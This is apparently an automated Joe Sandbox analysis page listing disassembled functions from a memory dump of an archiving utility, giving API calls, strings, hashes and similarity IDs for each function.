Opcode Fuzzy Hash: ac745cfe4b5657cc6bb76da5427229ebf4d48396e1b9ea5014d84eaa9a418420
Instruction Fuzzy Hash: F9816E31D00159DFCF15EFA4D982AEDBBB9EF89310F10819AF515A7292DB306E45CB60

Uniqueness

Uniqueness Score: -1.00%

Function 009D4B04 Relevance: 7.7, APIs: 5, Instructions: 234
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 009D4B09
_CxxThrowException.MSVCRT(?,00A502C0), ref: 009D4B2F
wcscmp.MSVCRT ref: 009D4BCD
wcscmp.MSVCRT ref: 009D4C27
wcscmp.MSVCRT ref: 009D4C37

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: wcscmp$ExceptionH_prologThrow
String ID:
API String ID: 2750596395-0
Opcode ID: ebd29ca831ac2cd78ef977f517306184fbf2cdb88133f983394c5e48ab1d471c
Instruction ID: 1211b0ca5f3fba4438c734d6853231c32f739f6eb3b45c607f3d00884ecefb42
Opcode Fuzzy Hash: ebd29ca831ac2cd78ef977f517306184fbf2cdb88133f983394c5e48ab1d471c
Instruction Fuzzy Hash: BB91B931D41249EFCF14DFA8D884BEDBBB5BFA9304F14805AE451AB391CB34AA45CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00A1B0FC Relevance: 7.7, APIs: 5, Instructions: 168COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00A1B101

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 61108215ab0526767d9ecd0273bb3e21e7695a1583c40188ec8c7d4d5f13bb3a
Instruction ID: 8058391e68194e0dab20b0de74fb8a7ee752a944463b063f2669fc4d7b89205c
Opcode Fuzzy Hash: 61108215ab0526767d9ecd0273bb3e21e7695a1583c40188ec8c7d4d5f13bb3a
Instruction Fuzzy Hash: B051AE35A10205AFDB10DFA4C981BFEB3B5FF88354F158529E911AB241D770A985CB70

Uniqueness

Uniqueness Score: -1.00%

Function 00A04941 Relevance: 7.7, APIs: 5, Instructions: 151COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00A5A878), ref: 00A0494C
fputs.MSVCRT ref: 00A049F8
fputs.MSVCRT ref: 00A04A72
fputs.MSVCRT ref: 00A04A8C
LeaveCriticalSection.KERNEL32(00A5A878,?), ref: 00A04B13

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: fputs$CriticalSection$EnterLeave
String ID:
API String ID: 1081906680-0
Opcode ID: 4baf4f7db3e3f91539569e1469dee9145c40ade8df523155655e7ff26f145d63
Instruction ID: 36702271901d846e95bc137cbe373d361f973391d091fb58c10a4abb674b83ca
Opcode Fuzzy Hash: 4baf4f7db3e3f91539569e1469dee9145c40ade8df523155655e7ff26f145d63
Instruction Fuzzy Hash: B651D07424130ADFDB24DF64E881BAABBA1FF88350F00842EF65A472D1CB71AC55CB51

Uniqueness

Uniqueness Score: -1.00%

Function 009D69AB Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 398COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 009D69B0
SetLastError.KERNEL32(00000002,-00000050,0000000F,-00000038,:$DATA,?,00000000,?), ref: 009D6C02

Part of subcall function 009D69AB: wcscmp.MSVCRT ref: 009D6DDE

Part of subcall function 009D692E: __EH_prolog.LIBCMT ref: 009D6933
Part of subcall function 009D692E: GetFileAttributesW.KERNELBASE(?,?,?,00000000,?), ref: 009D6953
Part of subcall function 009D692E: GetFileAttributesW.KERNELBASE(?,00000000,?,?,00000000,?), ref: 009D6982

Strings

:$DATA, xrefs: 009D6B18, 009D6B2A

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: AttributesFileH_prolog$ErrorLastwcscmp
String ID: :$DATA
API String ID: 3316598575-2587938151
Opcode ID: ead9143bd2e622dfb80c79e4e440fa90905440031fe6bb6fdc6962a5a931c717
Instruction ID: 5002a1ae796c98337da426aa620b8f70ac9365bbd1b7fdc1980e2f8f3bf43159
Opcode Fuzzy Hash: ead9143bd2e622dfb80c79e4e440fa90905440031fe6bb6fdc6962a5a931c717
Instruction Fuzzy Hash: 39E114349802059ACF24EFA4D8917EEBBB5AF94314F10C51FE886673D2DB746959CB20

Uniqueness

Uniqueness Score: -1.00%

Function 009E5CBE Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 125COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 009E5CC3

Part of subcall function 009E5B6A: __EH_prolog.LIBCMT ref: 009E5B6F

Strings

Incorrect reparse stream, xrefs: 009E5D30
Unknown reparse stream, xrefs: 009E5D3E
can't delete file, xrefs: 009E5DCF

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: H_prolog
String ID: Incorrect reparse stream$Unknown reparse stream$can't delete file
API String ID: 3519838083-394804653
Opcode ID: ead05565a214511c848a417f911f6fc6ba2d970ebe8eba21156bfd644ba314e9
Instruction ID: e49c017436424e004f9828fd7f5675042b1af8f849c851a41d356e8ec436fe70
Opcode Fuzzy Hash: ead05565a214511c848a417f911f6fc6ba2d970ebe8eba21156bfd644ba314e9
Instruction Fuzzy Hash: 1D41B772900AC4EFCF22DFA585856EEBBF9AF95304F59446ED086A3241C6706E84CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00A072D6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00A072DB
fputs.MSVCRT ref: 00A07344
fputs.MSVCRT ref: 00A0735B

Strings

= , xrefs: 00A07356

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: fputs$H_prolog
String ID: =
API String ID: 2614055831-2525689732
Opcode ID: 12f2cb1287c07263734f0873120cebc898837b779aac0739b92c5366c90ce1c0
Instruction ID: a048c51d73ac7de5500d82f892024244846a5037c4a9cdcff5338b9a3dfa1d6e
Opcode Fuzzy Hash: 12f2cb1287c07263734f0873120cebc898837b779aac0739b92c5366c90ce1c0
Instruction Fuzzy Hash: 49218132908118EFDF05EB94E942BEEBBB5EF94310F20411BF401722D1DB716A54DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 009F5DE6 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 64COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 009F5DEB

Part of subcall function 009F683E: __EH_prolog.LIBCMT ref: 009F6843
Part of subcall function 009F683E: wcscmp.MSVCRT ref: 009F68D0

Part of subcall function 009D1E89: free.MSVCRT(?,009F6CD6,00000000,00000000,00000001,?,009D10EB), ref: 009D1E8D

Part of subcall function 00A16B33: _CxxThrowException.MSVCRT(?,00A4FFC8), ref: 00A16B59

Part of subcall function 009F62D5: __EH_prolog.LIBCMT ref: 009F62DA

Part of subcall function 009F5F61: __EH_prolog.LIBCMT ref: 009F5F66

Strings

Hash, xrefs: 009F5E02
A0, xrefs: 009F5E26
sha256 sha512 sha224 sha384 sha1 sha md5 crc32 crc64 asc cksum, xrefs: 009F5E34

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: H_prolog$ExceptionThrowfreewcscmp
String ID: A0$Hash$sha256 sha512 sha224 sha384 sha1 sha md5 crc32 crc64 asc cksum
API String ID: 4250029832-3656212537
Opcode ID: d508e0b451408c7921591ea1dde2daa93cc44ba114044a621be9950114e40021
Instruction ID: 1eae3562ea4abb41f71fafac9ce1b890c269259abebfc5be86a0eb1ccb8908f6
Opcode Fuzzy Hash: d508e0b451408c7921591ea1dde2daa93cc44ba114044a621be9950114e40021
Instruction Fuzzy Hash: 51215B75D05388EECB05EBE4D596AEDBBB4AF95310F20416EE50167282DB740F08CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00A07170 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00A07175
fputs.MSVCRT ref: 00A0718A
fputs.MSVCRT ref: 00A07193

Part of subcall function 00A071EE: __EH_prolog.LIBCMT ref: 00A071F3
Part of subcall function 00A071EE: fputs.MSVCRT ref: 00A07230
Part of subcall function 00A071EE: fputs.MSVCRT ref: 00A07266

Strings

= , xrefs: 00A0718E

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: fputs$H_prolog
String ID: =
API String ID: 2614055831-2525689732
Opcode ID: 1ea0f5d41790cb67c8d6c881b30ba01ebf2dce45d449db0588b6e666e35310c2
Instruction ID: ca58387adf8a96ceb9e3b059793bf5fb91a1315295958bd626490a7a95960709
Opcode Fuzzy Hash: 1ea0f5d41790cb67c8d6c881b30ba01ebf2dce45d449db0588b6e666e35310c2
Instruction Fuzzy Hash: A9016D36A00108BBCF15BBA8E816BAE7B7AEFC4710F10812BF501562E1CB755A55DFE1

Uniqueness

Uniqueness Score: -1.00%

Function 00A1EF23 Relevance: 6.1, APIs: 4, Instructions: 71COMMON

Download Yara Rule

APIs

_CxxThrowException.MSVCRT(?,00A4FFC8), ref: 00A1EF64
memcpy.MSVCRT ref: 00A1EF85
_CxxThrowException.MSVCRT(?,00A4FFC8), ref: 00A1EFA9
__EH_prolog.LIBCMT ref: 00A1EFB3

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: ExceptionThrow$H_prologmemcpy
String ID:
API String ID: 3273695820-0
Opcode ID: c443d4fc2ecc3ae7de1f3ec1788865460e0fa5fa76247351dbd2fb320f1d4acc
Instruction ID: 92504bcf24db860e8c7327fa0c5c455fe28550000e74abb80ba4a7069398ba85
Opcode Fuzzy Hash: c443d4fc2ecc3ae7de1f3ec1788865460e0fa5fa76247351dbd2fb320f1d4acc
Instruction Fuzzy Hash: DB11D676B00248AFCB10EFA9D88199EBBE9EB88744B00453EF919C7390DB70ED45C790

Uniqueness

Uniqueness Score: -1.00%

Function 00A37DB0 Relevance: 6.0, APIs: 4, Instructions: 38synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,?,00000000,009E9905), ref: 00A37DBA
GetLastError.KERNEL32(?,00000000,009E9905), ref: 00A37DCB
FindCloseChangeNotification.KERNELBASE(00000000,?,00000000,009E9905), ref: 00A37DDF
GetLastError.KERNEL32(?,00000000,009E9905), ref: 00A37DE9

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: ErrorLast$ChangeCloseFindNotificationObjectSingleWait
String ID:
API String ID: 414953474-0
Opcode ID: ccd57339969ed5140e278340b806fa71423483bce5e346e3a1376e4e2a4faf6e
Instruction ID: 6f6719e27c5bc0a0fef02cef24e0985c661a9d0656b829e6fd7afcfeaba1bc69
Opcode Fuzzy Hash: ccd57339969ed5140e278340b806fa71423483bce5e346e3a1376e4e2a4faf6e
Instruction Fuzzy Hash: 53F0FEB530820257DB309BBD9C84F7B66E8AF923F5F200726F964D21E4EA61CC419A60

Uniqueness

Uniqueness Score: -1.00%

Function 009F0E95 Relevance: 6.0, APIs: 1, Strings: 2, Instructions: 722COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 009F0E9A

Part of subcall function 009D729C: GetLastError.KERNEL32(009DB903), ref: 009D729C

Part of subcall function 009F1A6B: __EH_prolog.LIBCMT ref: 009F1A70

Part of subcall function 009D1E89: free.MSVCRT(?,009F6CD6,00000000,00000000,00000001,?,009D10EB), ref: 009D1E8D

Strings

The item is a directory, xrefs: 009F106B
Cannot find archive file, xrefs: 009F1058, 009F1774

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: H_prolog$ErrorLastfree
String ID: Cannot find archive file$The item is a directory
API String ID: 683690243-1569138187
Opcode ID: d7c2257a4ca3a9335de937d5cf471c69cb2016c752c70478a4d908ac880eb05d
Instruction ID: 4e692041ebc308bd8e937877fd88933322df750ab3deec94959c878fc4736544
Opcode Fuzzy Hash: d7c2257a4ca3a9335de937d5cf471c69cb2016c752c70478a4d908ac880eb05d
Instruction Fuzzy Hash: 2F724974D00258DFCB25DF68C980BEDBBB5AF99304F14809AE959A7352CB709E80CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00A0B752 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00A0B767
fputs.MSVCRT ref: 00A0B979

Strings

. , xrefs: 00A0B8F7

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: CountTickfputs
String ID: .
API String ID: 290905099-4150638102
Opcode ID: c4e6dbc304db9004da7e83ce9635f3dd7746286e063618a369e8726275ffc82c
Instruction ID: 366e233a0949a980267bf74abdcb00f7a5e744e2ce0bc1de0881d7567b7d1de7
Opcode Fuzzy Hash: c4e6dbc304db9004da7e83ce9635f3dd7746286e063618a369e8726275ffc82c
Instruction Fuzzy Hash: FA715935610B089FCB21EF69D691BAAB7F5AF95304F108C1EE19797691DB70F848CB20

Uniqueness

Uniqueness Score: -1.00%

Function 00A0F686 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84COMMON

Download Yara Rule

APIs

Part of subcall function 009D9852: GetModuleHandleA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx), ref: 009D9876
Part of subcall function 009D9852: GetProcAddress.KERNEL32(00000000), ref: 009D987D
Part of subcall function 009D9852: GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 009D988B

__aulldiv.LIBCMT ref: 00A0F70F
__aulldiv.LIBCMT ref: 00A0F71B

Strings

3333, xrefs: 00A0F6F9

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: __aulldiv$AddressGlobalHandleMemoryModuleProcStatus
String ID: 3333
API String ID: 3520896023-2924271548
Opcode ID: 60b01b0ef032251a32f3952797061ff945020e8e91714d197adc220a7d2c41df
Instruction ID: 3c216ec0b90e1175b99f417c63f7067820dc06cd9f51fb1cda21df9163068119
Opcode Fuzzy Hash: 60b01b0ef032251a32f3952797061ff945020e8e91714d197adc220a7d2c41df
Instruction Fuzzy Hash: 7A2195B1D007046ED730AF7A9881B5BFAF8EB84714F14893EB146E7681D670A9048B66

Uniqueness

Uniqueness Score: -1.00%

Function 009D72B9 Relevance: 4.6, APIs: 3, Instructions: 64fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 009D72BE

Part of subcall function 009D736B: FindCloseChangeNotification.KERNELBASE(00000000,?,009D72CE,00000002,?,00000000,00000000), ref: 009D7376

CreateFileW.KERNELBASE(00000000,00000000,?,00000000,00000002,00000000,00000000,?,00000000,00000002,?,00000000,00000000), ref: 009D7304
CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,00000000,?,00000000,00000002), ref: 009D7345

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: CreateFile$ChangeCloseFindH_prologNotification
String ID:
API String ID: 3273702577-0
Opcode ID: 4c259d19eced32c1be369ce171c6b1b1f4235bd06fa4647e716320a9cbf55e4c
Instruction ID: d328e19c726ff301c48ed1488fd1faee7b6675c7def2b800262229adc4a9a5cf
Opcode Fuzzy Hash: 4c259d19eced32c1be369ce171c6b1b1f4235bd06fa4647e716320a9cbf55e4c
Instruction Fuzzy Hash: F311B47280020AEFCF119FA4EC418EEFB7AFF94354B14C62AF960522A1C7319D61EB50

Uniqueness

Uniqueness Score: -1.00%

Function 00A071EE Relevance: 4.6, APIs: 3, Instructions: 60COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 00A07266
fputs.MSVCRT ref: 00A07230

Part of subcall function 009D1FFC: __EH_prolog.LIBCMT ref: 009D2001

__EH_prolog.LIBCMT ref: 00A071F3

Part of subcall function 009D1FE9: fputc.MSVCRT ref: 009D1FF0

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: H_prologfputs$fputc
String ID:
API String ID: 678540050-0
Opcode ID: 460c53a36deff2c631b7fd51657edbc22d4f0b007a6be33a7d06109187f15134
Instruction ID: 992e24da51750b3c2746910d9e0f0a782c8e48c336d83762fe90de1a43e9c1d4
Opcode Fuzzy Hash: 460c53a36deff2c631b7fd51657edbc22d4f0b007a6be33a7d06109187f15134
Instruction Fuzzy Hash: 7511E936B481146BCF09B7A8D813AAE7B7AEFC4710F00402BF101633D1DF615945CAD4

Uniqueness

Uniqueness Score: -1.00%

Function 009D7450 Relevance: 4.6, APIs: 3, Instructions: 60COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000002,?,00000000,?,00000002,00000002,?,00000002,?,009D74FA,?,?,00000000,?,009D7551,?), ref: 009D7492
GetLastError.KERNEL32(?,009D74FA,?,?,00000000,?,009D7551,?,?,?,?,00000000), ref: 009D749F
SetLastError.KERNEL32(00000000,?,?,009D74FA,?,?,00000000,?,009D7551,?,?,?,?,00000000), ref: 009D74B6

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: ErrorLast$FilePointer
String ID:
API String ID: 1156039329-0
Opcode ID: 2da54bee4a6b7fd410e1793977d1ee0ccbe13c628530a737cb8728a7dbce0cdc
Instruction ID: a028188bd45213f1b4de8a8bef70531d9ae31cdba485b3f1fbecc409c96f33b4
Opcode Fuzzy Hash: 2da54bee4a6b7fd410e1793977d1ee0ccbe13c628530a737cb8728a7dbce0cdc
Instruction Fuzzy Hash: C811D034204204AFDB12CFA8CC49B9BBBEAAB45324F00C52AF856963A0E7719D10DB50

Uniqueness

Uniqueness Score: -1.00%

Function 009D57AB Relevance: 4.6, APIs: 3, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 009D57B0
SetFileAttributesW.KERNELBASE(?,?,?,?,00000000), ref: 009D57D6
SetFileAttributesW.KERNEL32(?,?,00000000,?,?,00000000), ref: 009D580B

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: AttributesFile$H_prolog
String ID:
API String ID: 3790360811-0
Opcode ID: 562d77b94b074e20518c0b1db1a54e8465bd0de7a68d4e9a145444b2d6b7e5be
Instruction ID: a48a8555002e643646fd027a2747a795e131e3746746c375e90d854979c80602
Opcode Fuzzy Hash: 562d77b94b074e20518c0b1db1a54e8465bd0de7a68d4e9a145444b2d6b7e5be
Instruction Fuzzy Hash: E901B576D40216ABCF05ABA0E8416BFBB7AEFC4351F25C427E811A3391CB794D11E790

Uniqueness

Uniqueness Score: -1.00%

Function 009D692E Relevance: 4.5, APIs: 3, Instructions: 47COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 009D6933
GetFileAttributesW.KERNELBASE(?,?,?,00000000,?), ref: 009D6953

Part of subcall function 009D1E89: free.MSVCRT(?,009F6CD6,00000000,00000000,00000001,?,009D10EB), ref: 009D1E8D

GetFileAttributesW.KERNELBASE(?,00000000,?,?,00000000,?), ref: 009D6982

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: AttributesFile$H_prologfree
String ID:
API String ID: 86656847-0
